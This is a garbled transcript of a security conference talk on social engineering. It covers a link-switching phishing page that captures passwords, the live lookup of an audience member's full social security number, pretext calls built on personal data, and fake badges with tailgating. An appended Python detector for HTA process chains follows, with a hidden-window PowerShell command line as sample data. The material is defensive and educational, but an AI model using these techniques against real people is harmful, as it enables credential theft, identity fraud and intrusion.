So let me show you the Web Jacking method really fast. So what I'll usually do is I'll send an e-mail out, right? And I'll try to remove all barriers I possibly can. I'm just going to the Web Jacking vector. I'm going to hit number two and I'm going to call it as an example just because it has a username and password field on it. Now the messed up part with Web Jacking is this. I didn't close that outright. That's why I crashed. So what I'll usually do is I'll create a website that looks similar to the company. Letterheads and everything has a nice website type design. And I'll do a pretext of whatever I want. So maybe it's a company survey or something like that. It's company.trustedsec.com a valid domain that is owned by that company. Yeah, right? So if I'm going to survey.trustedsec.com that's legit, right? So if I make a website that says make sure when you hover over this link it's SSL and then it's going to survey.trustedsec.com and when you hover over the link it's legitimate for anti-phishing purposes. So if I hover over this link and make this website look good and the address bar says https.com. So that's a legit address. So if I click that link in my browser if I'm using Firefox I don't know if anybody uses this operator anymore. Chrome or IE should my browser go to accounts.google.com? Yes, right? So watch what happens when I click this link. This is one of the messed up ones because it takes advantage of what we call the hover. We hover over the link to make sure the link is legitimate before you click the link. This defeats that unfortunately. So what you can actually see here is when I click on this it's actually going to go to accounts.google.com. The website is actually going to be there for a couple of seconds and then it's going to do a fast switcheroo really quick and then we're going to be at our malicious website where we can capture using a password or whatever it is on the bottom left-hand side accounts.google.com, right?
So if I click it, no hands I'm at accounts.google.com, right? Oh, quicks are true. Notice the URL bar on the top, switched really fast. I'm actually at my malicious website which is 192.168.17.161 and this is my user now my password goes in redirects back to the legitimate sites so they never knew that as a bad place in the first place and then over here in my account. So very effective attack that you can couple with other ones, right? So you can use that in conjunction with the Java applet attack or an HTA attack or whatever else but what's interesting is when I do most social engineers I don't ever use an exploit. I don't use an exploit anymore. There's no reason for me to use an exploit. They may get picked up by something like an EMET or a next-gen type thing. Just use how operating systems are designed to suck. You use Java how it's designed to be horrible, right? You just use those types of techniques that you can use because people are going to believe whatever you do when you actually go and do it. So this one for me is probably one of the most effective ones that I've had a good success rate on. I'm going to show you another one here. I'm going to take my screen up just for a second just to make sure I can get to it real quick. If I can't then I apologize but one second here is good. So Chris, do I have your permission? What's that? Well, it's just a good site. Ah, come on. All right, Chris, I promise you I'm going to have you come up on stage here, okay? But hang on. I'm going to pull your date of birth, your home address, your social security number, and a bunch of other stuff, your full social. But I'm not going to put it on the screen. I'm not going to put it on the screen. I'm going to have you come and confirm it. All right? What did I do last year? Oh, no, I'm not going to put it on the screen. That's where I got it. It's off the screen. All right, hang on. Did someone do it to you? Okay, hang on a second. All right, how long has it taken me?
I had to log into my VPN really quick to get access to the database, but hang on a second. Hang on, is your beginning of your home phone start at 570? I didn't know you were that old. Really? This can't be right. This can't be right. Is it your full social? Yeah. Okay. I didn't know you were that old. Congratulations. You look great. You look great. You look great. I'm proud of that. I got rid of it. It's done. There's no remnants of that. It's gone. Don't worry. If I wanted, I had it, obviously. So if you don't know this, there are ways to get people's personal information and do a lot of reconnaissance on them. One of the things I like to do if I'm targeting individuals, I'll pull specific personal information about them, like challenge questions or things they may be used for security questions or things like that. One of the big ones is social security numbers. Social security numbers are extremely easy to get if you know how to get them. I just pulled Chris's full social. It wasn't his last four. It would have been bad. I thought it would have been funny. He didn't even find it funny. So I actually did something recently where I was on a phone with somebody and I was trying to get some information from them. What I used to get rid of that trust factor is I said I just want to confirm your last four. I'm going to prove to you that I know who you are and that this is part of it. Your last four is this. Your home address is this. Here's your personal number here. I need this and this and this and this and this. Here you go, here you go, here you go, here you go. Any way you can alleviate any type of trust factor when you're going after somebody is very beneficial and very effective when you actually go on target. Just as an example, last week one of our guys, Paul, was doing a physical. He went to this big company. They have multiple headquarters or multiple campuses and everything. 
He had his phone out and he's looking lost and everything and he sees an employee with the badge. He goes to this employee and he says hey, I'm lost. How do I get to the main building because I'm here for a job interview? The employee was extremely helpful as I would be too. The employee didn't do anything wrong at all. Just was trying to help somebody that was trying to get to a main campus. Just normal conversation. Doesn't trigger anything. So as soon as he did that, we went to Kinko's. We made fake badges and we walked right into the building. You don't need to do a Proxmark to clone a badge. You just walk behind somebody. If you have a badge, you look good. You walk in and plug into the network and you hack away. It all comes down to making sure you have a confidence level and that you alleviate anything that might happen with trust. I guess that's really the big goal for social engineers. If you're looking at getting the biggest thing I can give you as far as tips and I'm not the greatest social engineer, I mean Chris could run circles around me and I'm actually giving you a compliment, Chris. I cannot code you. But the biggest thing I can give you is that one, you have to have confidence when you're doing your calls or you're in person because humans can sense when you're nervous. If I'm on the phone and my name is okay, you're right back. You know, they're going to make why that dude was really weird and something's not right there, right? That's how Chris sounds, I'm just kidding. But, you know, there's certain things that give you clear indicators. If you come off confident, your story is believable. And when I say believable, the research that you did on an individual target or the company is believable, you can really pretty much pull off anything you want to. And it doesn't matter what that is or what you're trying to get access to. In most cases there are those barriers by talking to a person as a human being and being positive.
I don't usually like using negative reinforcement for anything or negative persuasion. If you're just positive that you can almost always get everything you want to. And you have to have a very high success rate. If I can research my target for an hour or two, I have a very high percentage chance of being successful of who I'm going after. And that's very, very hard to protect against. So I appreciate everybody's time. That would be great. Sure. Yeah, no problem.
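The HTA chain demonstrated in the talk (a browser opens an .hta, mshta.exe runs it, and PowerShell is then launched for the injection) leaves a parent/child process trail that a defender can hunt for in process-creation telemetry. The following is an added example written for this page, not code from the talk, from TrustedSec or from the Social-Engineer Toolkit; it runs that check over constructed Sysmon-style process-creation records. The record fields, PIDs and command lines are all assumed sample data.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class ProcEvent:
    # Minimal shape of a process-creation record (Sysmon Event ID 1 style).
    # Field names and values are constructed for this example, not from a real host.
    pid: int
    ppid: int
    image: str
    cmdline: str
    user: str

# Parents that a user-driven HTA launch typically comes from, the HTA host
# itself, and the script hosts an HTA commonly hands off to.
BROWSERS = {"iexplore.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
HTA_HOST = "mshta.exe"
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def find_hta_chains(events: List[ProcEvent]) -> List[Tuple[int, str, str, str]]:
    """Flag (pid, reason, parent_image, cmdline) for two links of the chain:
    a browser spawning mshta.exe, and mshta.exe spawning a script host."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent is None:
            continue  # parent not in this batch; nothing to correlate against
        child, par = basename(e.image), basename(parent.image)
        if child == HTA_HOST and par in BROWSERS:
            findings.append((e.pid, "mshta.exe launched from browser", par, e.cmdline))
        elif child in SCRIPT_HOSTS and par == HTA_HOST:
            findings.append((e.pid, "script host spawned by mshta.exe", par, e.cmdline))
    return findings

# Constructed sample batch: one HTA chain plus benign activity that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", "CORP\\alice"),
    ProcEvent(200, 100, r"C:\Program Files\Internet Explorer\iexplore.exe",
              "iexplore.exe https://survey.example.invalid/", "CORP\\alice"),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://survey.example.invalid/launcher.hta", "CORP\\alice"),
    ProcEvent(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c [placeholder script]", "CORP\\alice"),
    ProcEvent(500, 100, r"C:\Program Files\Microsoft Office\OUTLOOK.EXE",
              "outlook.exe", "CORP\\alice"),
    # An admin running PowerShell from Explorer is normal and must not be flagged.
    ProcEvent(600, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Get-Service", "CORP\\bob-admin"),
]

if __name__ == "__main__":
    for pid, reason, parent, cmdline in find_hta_chains(SAMPLE_EVENTS):
        print(f"pid={pid} parent={parent}: {reason} :: {cmdline}")
```

Run as-is it reports two findings, the mshta.exe launch (pid 300) and the PowerShell it spawned (pid 400), and nothing for the Outlook or admin PowerShell events. The parent/child pairing is the point: neither mshta.exe nor PowerShell is rare on its own, but a browser handing off to mshta.exe which then starts a script host is the exact sequence the talk demonstrates, so correlating the two edges is what keeps the rule quiet on normal hosts.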